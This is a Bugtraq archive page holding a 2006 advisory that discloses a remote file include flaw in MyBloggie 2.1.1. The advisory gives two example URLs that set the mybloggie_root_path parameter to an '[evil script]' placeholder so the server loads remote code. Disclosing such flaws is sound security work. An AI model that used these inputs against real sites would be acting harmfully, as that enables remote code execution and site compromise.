Bugtraq: # MHG Security Team --- MyBloggie 2.1.1 version Remote File Include Vulnerabilit

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Bugtraq mailing list archives

# MHG Security Team --- MyBloggie 2.1.1 version Remote File Include Vulnerabilit

From: "erne ayaz" <beceriksiz1986 () hotmail com>
Date: Fri, 02 Jun 2006 17:57:31 +0000

# Milli-Harekat Advisory ( www.milli-harekat.org )

# MyBloggie <= 2.1.1 version - Remote File Include Vulnerabilities

# Risk : meduim

# Class: Remote

# Script : MyBloggie 2.1.1 version

# Msn : erne [at] ernealizm.com

# Credits : ERNE

# Thanks : Dj_ReMix,Eskobar,Blackened,TR_IP,ßyKorsaN,OsL3m7,Poizonbox,Di_lejyoner and All MHG USERS


# Vulnerable :

http://www.site.com/blog/admin.php?mybloggie_root_path=[evil script]

http://www.site.com/blog/scode.php?mybloggie_root_path=[evil script]

_________________________________________________________________

Dont just search. Find. Check out the new MSN Search!http://search.msn.click-url.com/go/onm00200636ave/direct/01/

By Date By Thread

Current thread:

# MHG Security Team --- MyBloggie 2.1.1 version Remote File Include Vulnerabilit erne ayaz (Jun 02)
- <Possible follow-ups>
- Re: # MHG Security Team --- MyBloggie 2.1.1 version Remote File Include Vulnerabilit nukedx (Jun 04)
- Re: # MHG Security Team --- MyBloggie 2.1.1 version Remote File Include Vulnerabilit Steven M. Christey (Jun 06)